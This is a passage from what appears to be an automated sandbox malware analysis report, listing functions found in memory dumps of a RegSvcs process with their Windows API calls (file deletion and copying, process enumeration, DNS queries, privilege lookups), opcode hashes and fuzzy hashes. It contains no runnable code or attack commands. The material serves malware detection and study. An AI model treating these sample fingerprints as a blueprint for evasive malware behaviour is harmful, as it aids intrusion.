Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 8c94d71e3b5bcd43af0e72ef3fc671dffd546120cf4d6f9d4e2985f0d488bbd6
Instruction ID: 7ad7d7d50ebae89f95d5db1955d41ba12cf446d1380262a8fa1e213f35f97f33
Opcode Fuzzy Hash: 8c94d71e3b5bcd43af0e72ef3fc671dffd546120cf4d6f9d4e2985f0d488bbd6
Instruction Fuzzy Hash: 3C11BF72500300AFEB21CF55DC44F6AFBA8EF14320F1485ABE9098B641C274E9449BB6

Uniqueness

Uniqueness Score: -1.00%

Function 0018BB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0018BBB9

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ad71bdcd88a4572bb2e5641994222b66fc23899fd786652f9491587ab0c92c47
Instruction ID: eb035ebd6b2bd48027be59494a8fb783a299a32effba8cbd2bbff5c9cdc95d34
Opcode Fuzzy Hash: ad71bdcd88a4572bb2e5641994222b66fc23899fd786652f9491587ab0c92c47
Instruction Fuzzy Hash: EB11E131108780AFD7128F21CC45B52FFB0EF06220F0885DEED858B563D371A818DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0018BE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 0018BE70

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: bffd18ff2f5ba5a6d4d913c50ce776e7480f04b7c5f765f469b0ae2df13a482c
Instruction ID: 23de859ed5a518c13b2cf81f60a2088eabc88be80eb511f2297de3cd5e1441b8
Opcode Fuzzy Hash: bffd18ff2f5ba5a6d4d913c50ce776e7480f04b7c5f765f469b0ae2df13a482c
Instruction Fuzzy Hash: 61118E7540D3C0AFD7128B259C84B61BFB4EF47624F0980DAED848F263D2656908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0018BEB4, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0018BF0C

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 72a70aef0bb6c987fa7e036244e8ab0b8242d88aa05830d2b26d5f18dbf14ca1
Instruction ID: 5d29d4544c08dc6c40f119209a4ada01d7378d81e48a1fa642df6c1d6b9921ee
Opcode Fuzzy Hash: 72a70aef0bb6c987fa7e036244e8ab0b8242d88aa05830d2b26d5f18dbf14ca1
Instruction Fuzzy Hash: 9F119E726093809FD711CF25DC85B96BFE8EF46220F0884AAED49CB252D374E908CF61

Uniqueness

Uniqueness Score: -1.00%

Function 004D118F, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 004D11F4

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 1f968cd8afbe194c4247e0844157ce2eb2cb498dfb1c970bfc6b194b2086d90d
Instruction ID: 4910c6fad8ea3970700ef5b55d9e7c6cdfbb59b3fd0bc9a92e29100fdd1229be
Opcode Fuzzy Hash: 1f968cd8afbe194c4247e0844157ce2eb2cb498dfb1c970bfc6b194b2086d90d
Instruction Fuzzy Hash: 291181714093C09FD7128B24DC54756BFB4EF46224F0984DBDD888B263C279A849CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0018BAB0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0018BB0B

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1ef7640d2de090bb731ce2c707ef56555f9a3c6346a7969a7630423347dad9db
Instruction ID: b8c43e04b4caa1bc3612e3174e38b17dc7d27b5b28ecaa569b6588126643873b
Opcode Fuzzy Hash: 1ef7640d2de090bb731ce2c707ef56555f9a3c6346a7969a7630423347dad9db
Instruction Fuzzy Hash: DF11A0725087809FE7118F15DC85B92FFE4EF06320F0880DEED858B262D275A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004D131A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004D1362

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: cbbe08183afbaa552c5c12c95b72da202b7d581089d578b976ddb331e9617e88
Instruction ID: c7943a98d1443e000de65b12137f35eda0f4c831b350976bd866af0fe37a3972
Opcode Fuzzy Hash: cbbe08183afbaa552c5c12c95b72da202b7d581089d578b976ddb331e9617e88
Instruction Fuzzy Hash: 4A1130756003009BFB10CF59DC95766FBD8EB14720F0884ABDD49CB752D674E854CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004D0AD6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 004D0B1E

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: cbbe08183afbaa552c5c12c95b72da202b7d581089d578b976ddb331e9617e88
Instruction ID: b7b7f2e0aa989627426fbc55e45cd19c48d3a6f49a1cf4d5e9dc03c1677c218f
Opcode Fuzzy Hash: cbbe08183afbaa552c5c12c95b72da202b7d581089d578b976ddb331e9617e88
Instruction Fuzzy Hash: F611A1716043048FEB10CF69DC95B66FBE8EB14324F0884ABDC09CB342D278E804CA66

Uniqueness

Uniqueness Score: -1.00%

Function 0018A75B, Relevance: 1.6, APIs: 1, Instructions: 52comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0018A7BC

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bcdb55049c9d4affd9d8452efbda64134667514356130ac26f787ac59e6376a8
Instruction ID: 6d96e4e0ee6bd3f6ef27f7e09acedf5b4e0c60fd29f4d31c127427a07a757ea2
Opcode Fuzzy Hash: bcdb55049c9d4affd9d8452efbda64134667514356130ac26f787ac59e6376a8
Instruction Fuzzy Hash: EF119E75549380AFE711CF15DC89B52BFB4EF46320F08849AED488B253D276A918CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004D075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 004D079F

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 03a8075d867636580e46dc3deec0e709f28d1c5513c1e8a164641ba2071f2118
Instruction ID: 6902cbf40a883deb90cebae8e8043cd18d85f99b2a7d40883a2f65e64fcdd07b
Opcode Fuzzy Hash: 03a8075d867636580e46dc3deec0e709f28d1c5513c1e8a164641ba2071f2118
Instruction Fuzzy Hash: D4115E756012409FEB60CF19D895B6AFBD8EB04320F0884ABDD09CF742D678E944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004D0932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D0985

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c8dd4c7a11384fbf113705a70ae6d30a627aa27d30210a1c64d537f34cf8aaab
Instruction ID: d43f74d8a8e08947478d9a57bb4d75105e5e6f17847680faab405794bf93dfca
Opcode Fuzzy Hash: c8dd4c7a11384fbf113705a70ae6d30a627aa27d30210a1c64d537f34cf8aaab
Instruction Fuzzy Hash: 9A01D271500300AFF720CB15DC95BBAFBA8EF44720F1480D7EE489B342D678A9448AB6

Uniqueness

Uniqueness Score: -1.00%

Function 004D1616, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32 ref: 004D1656

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 46ee8d45021eb96c2751ac162e79badc3ce4474618db483c29aff46ae3a1a3e9
Instruction ID: 43933b21a387a2612b98754d2d8b395df2adb014c49037aef061f5c57500d955
Opcode Fuzzy Hash: 46ee8d45021eb96c2751ac162e79badc3ce4474618db483c29aff46ae3a1a3e9
Instruction Fuzzy Hash: 4911C0716003449FEB10CF65D888B66FBE4EF04320F0884ABDD09CB722D274E854CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0018A172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 0018A1C2

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 6350567618d7e0e5e5163519cc60e9749eb1924c7f66f501398d9d49f4b18f59
Instruction ID: c41300c3a58664788cd174af7f49dd35a77316d84bdeb2ebab944f531bee3ed4
Opcode Fuzzy Hash: 6350567618d7e0e5e5163519cc60e9749eb1924c7f66f501398d9d49f4b18f59
Instruction Fuzzy Hash: DF018471900701AFE310DF16DD45B26FBE8FB88A20F14816AED089B741D275F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0018B48C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 0018B4E3

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: 35107b2c3c76ef13c7c52d24731ba8d426de4ae7ac13aa2af0810cd378f91880
Instruction ID: 555bfe50b5c6a74ef6c83770c2bbded51f549b7238a8351338eb94222efa8d75
Opcode Fuzzy Hash: 35107b2c3c76ef13c7c52d24731ba8d426de4ae7ac13aa2af0810cd378f91880
Instruction Fuzzy Hash: 0411AD76508780AFD7218F15DC89B52FFA4EF16320F09809AED894B263D375A919CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0018BED2, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0018BF0C

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: e1762813dcbceab9df8e23adf0f17224489af74679fcb6c323669b5e20c532df
Instruction ID: 6e3bfc4a7aa3611cc470d6e9bb75eea4af5ba8edd2423ded38f2f20458ecaaa1
Opcode Fuzzy Hash: e1762813dcbceab9df8e23adf0f17224489af74679fcb6c323669b5e20c532df
Instruction Fuzzy Hash: 99015E716053409FEB10DF29DCC5766FB94EB04320F0884AADD09CB642D774E944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 004D0CCA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E40,?,?), ref: 004D0D1A

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: bdbbf0202f168bbfe6eb0ce731519bf8a6b7ac611f5cfa7439ba95f5b032d099
Instruction ID: d0bacf4f720a8f071efce5fc8469657e4f6f167d57c919de59b9a4db91fab215
Opcode Fuzzy Hash: bdbbf0202f168bbfe6eb0ce731519bf8a6b7ac611f5cfa7439ba95f5b032d099
Instruction Fuzzy Hash: 56017171900601AFE350DF16DD45B26FBA8FB88A20F14816AED089B741D275F525CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004D2FAA, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 004D2FFA

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 44ce019e53c3e48ad10e13aaa0e796252a2dc5eedc4e5c50df0d220ae963d68b
Instruction ID: e4696871b3f6f738fadcff91899e62a13fc2249eb4a5b21a0451ce309dfb5974
Opcode Fuzzy Hash: 44ce019e53c3e48ad10e13aaa0e796252a2dc5eedc4e5c50df0d220ae963d68b
Instruction Fuzzy Hash: 4E017171900601AFE350DF16DD45B26FBA8FB88A20F14816AED089B741D275F525CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0018A546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0018A58A

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eaa6174975c11ac1c45e043bcb54084c47fd3a0696d80c2e5be426b795c75b3c
Instruction ID: 3d5d4edf6464864a60d8c9d2efd7774d53ac398f12e6db20e6e369f6d7f5c798
Opcode Fuzzy Hash: eaa6174975c11ac1c45e043bcb54084c47fd3a0696d80c2e5be426b795c75b3c
Instruction Fuzzy Hash: 89016D325007009FEB218F55D844B66FFE0EF08320F08899ADE494A612D375E554DF62

Uniqueness

Uniqueness Score: -1.00%

Function 0018AF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E40,?,?), ref: 0018AFEA

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 238f29aeed19ea2234b6d61265d5aec1c2d7cf0833024f106ceaa96e7a7bf783
Instruction ID: 53c1d9b4013d9fbab27288001d2dd2c2c59966e573fba9ae20af4ef1a8aaa1df
Opcode Fuzzy Hash: 238f29aeed19ea2234b6d61265d5aec1c2d7cf0833024f106ceaa96e7a7bf783
Instruction Fuzzy Hash: 66018671900701ABD350DF16DC46B26FBE4FB88B20F148159ED085B741D275F525CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 004D05FE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 004D064E

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 32e822569f98bc640ec90a9df28344b74d6a5b97af28b5c8cf8760c71a347be3
Instruction ID: e97021c645fd642a6ba547ed6edfd46430e7a96447936c0560f11dffa400f1fb
Opcode Fuzzy Hash: 32e822569f98bc640ec90a9df28344b74d6a5b97af28b5c8cf8760c71a347be3
Instruction Fuzzy Hash: 3E016271900601ABD350DF16DC46B26FBA4FB88B20F14815AED085B741D275F525CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 004D19F6, Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E40,?,?), ref: 004D1A46

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 49a9a2d5f34b9ef21dde50481c087c588701d019f65c9056fdcf1ce82d5e03b2
Instruction ID: cd74f6cfcd36265414262fa0f0ffdb501e91baf87532ea8f3d51519c78cc38a3
Opcode Fuzzy Hash: 49a9a2d5f34b9ef21dde50481c087c588701d019f65c9056fdcf1ce82d5e03b2
Instruction Fuzzy Hash: 31016271900601ABD350DF16DC46B26FBA4FB88B20F14815AED085B741D275F525CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 0018BB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0018BBB9

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ecf82bc0336fb9d50f379187c22eed80ace9279240efa13d2eac5ce47ab9e9b2
Instruction ID: d03ce57810017177378909ef034f98f476674b97cfceffd4bc95b72d2df2acef
Opcode Fuzzy Hash: ecf82bc0336fb9d50f379187c22eed80ace9279240efa13d2eac5ce47ab9e9b2
Instruction Fuzzy Hash: C7017C365047409FEB208F16DC85B65FBA0EF14320F0880AADD4A8A666D375E958DF62

Uniqueness

Uniqueness Score: -1.00%

Function 0018BAD6, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0018BB0B

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1b0e0c906c3edf326098d754dc041b240a187d9698b4295697b0a704407564a2
Instruction ID: f1fe4ad5da3076708197dfc2c604a7cd644ff40f455e5bf3738e24eb9e6f4545
Opcode Fuzzy Hash: 1b0e0c906c3edf326098d754dc041b240a187d9698b4295697b0a704407564a2
Instruction Fuzzy Hash: 7401AD356047408BEB209F19ECC9765FBA4EB04320F08C0AADD4A8B656D375A958DF62

Uniqueness

Uniqueness Score: -1.00%

Function 0018A78A, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0018A7BC

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b24eed0e54e3d86be9a02aca0a2b07557bf507b54a514f844768b7063fd187ee
Instruction ID: b4955ed9fc9dd64280de5b9ee057f981872550ab0e56bf0ca83fc120de8cd597
Opcode Fuzzy Hash: b24eed0e54e3d86be9a02aca0a2b07557bf507b54a514f844768b7063fd187ee
Instruction Fuzzy Hash: 42018B755003409FFB10DF15D888765FBA4EF04320F48C4AADE088B602D276A644DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0018B806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0018B841

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d7fe2a78e8594ce04f2879a164729d68d4f813c22f68ca20e1c18a19d0d23f07
Instruction ID: 413a50d00744f86388714da2e9643df69de942030fdf28da8f631c284135ba4a
Opcode Fuzzy Hash: d7fe2a78e8594ce04f2879a164729d68d4f813c22f68ca20e1c18a19d0d23f07
Instruction Fuzzy Hash: E9018B31504740DFEB208F06D888B65FBA4EB19320F08809AED490A622D371A558DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0018B4AE, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 0018B4E3

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: 82eeb367c88eabd76d85b0c44efe92e90d3c76825753ab84c6caec8ac9d51925
Instruction ID: 82391b43b81aafb8421580b2158779bc0c98b18229b23d44e43df2fc02eb588e
Opcode Fuzzy Hash: 82eeb367c88eabd76d85b0c44efe92e90d3c76825753ab84c6caec8ac9d51925
Instruction Fuzzy Hash: 2A018C355047409FEB20DF05E889B65FFA0EF14720F08C0AADD494B712D375A958DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0018BE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 0018BE70

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: bb9d44405bf5cc265a78529bb0963a694a6a31cdace8b53339477a2cb6dbe69c
Instruction ID: 6f2c49c22909f9e6dff68620830cfd2497eff7c1a03f791f6ee3ff7a88112b76
Opcode Fuzzy Hash: bb9d44405bf5cc265a78529bb0963a694a6a31cdace8b53339477a2cb6dbe69c
Instruction Fuzzy Hash: 35F0AF35908744DFEB20DF05D8897A5FBA0EF04320F08C0AADE094B312D375A948DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0018A372, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0018A3A4

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: bb9d44405bf5cc265a78529bb0963a694a6a31cdace8b53339477a2cb6dbe69c
Instruction ID: df8887de2329cc664271e7e9a1bef0821479815864c79e87b0f38387d9f67288
Opcode Fuzzy Hash: bb9d44405bf5cc265a78529bb0963a694a6a31cdace8b53339477a2cb6dbe69c
Instruction Fuzzy Hash: A1F08C355003409FEB209F06D889769FBA0EF04320F58C09ADD494B612D375A954DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0018A4B6, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0018A4E5

Memory Dump Source

Source File: 00000008.00000002.671207513.000000000018A000.00000040.00000001.sdmp, Offset: 0018A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a000_RegSvcs.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 5008af6def865936456364672bab186198babaeafbe1e7f6ac7edf9c0b7a22f3
Instruction ID: 13d712f5d0ee6c69db2d7e816985283e9cad7b0dde15aafcefcccc965537029c
Opcode Fuzzy Hash: 5008af6def865936456364672bab186198babaeafbe1e7f6ac7edf9c0b7a22f3
Instruction Fuzzy Hash: F2F0AF315003408FEB10DF05D889765FB90EF04320F48C0AACD094B302D3B5A984DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 004502E8, Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

:@/q, xrefs: 00450537

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: 55977adf4d08f787ad7b797bd7acb99665e057a2ef2c81251bf60912d69ac194
Instruction ID: 21f882b59f3f8ebb85372db75246582352877833b13bd4a1c789bfef06a40931
Opcode Fuzzy Hash: 55977adf4d08f787ad7b797bd7acb99665e057a2ef2c81251bf60912d69ac194
Instruction Fuzzy Hash: 0D51B238B05205CFDB08DF64C5507AE7BF2EF89305F24846AD906AB3A2DB389C05DB56

Uniqueness

Uniqueness Score: -1.00%

Function 0045E738, Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

trsr, xrefs: 0045E757

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: trsr
API String ID: 0-678784716
Opcode ID: 2aa8c3a65d32069df963cbd81b3da378f567b3781b4fd0b3a6fc7bd1aeece0c4
Instruction ID: 24e4711a2984575cd16fca0fcc7e4ba52931da1ede71dece0ecce4c7856754d3
Opcode Fuzzy Hash: 2aa8c3a65d32069df963cbd81b3da378f567b3781b4fd0b3a6fc7bd1aeece0c4
Instruction Fuzzy Hash: 9F51C731A00119DFDF58EF94C8808AEB7B6FF84305715406AE806AF356DB74AE4ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 00450682, Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

TwTq, xrefs: 004506BC

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: TwTq
API String ID: 0-3443581126
Opcode ID: dc1abd0cbd46cb1aa603454043b8298f1de0f03583df8490536d54bed5eda8e4
Instruction ID: 3a965038d8db4a9477319a646448ad678be5d77bef6ae2328f4bf5049e361c6d
Opcode Fuzzy Hash: dc1abd0cbd46cb1aa603454043b8298f1de0f03583df8490536d54bed5eda8e4
Instruction Fuzzy Hash: D04179356282008FD708BB74EC1D66D3BA2BF94702724856BF802DB6E2CF745D85DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00458A21, Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

xEQ, xrefs: 00458AA3

Memory Dump Source

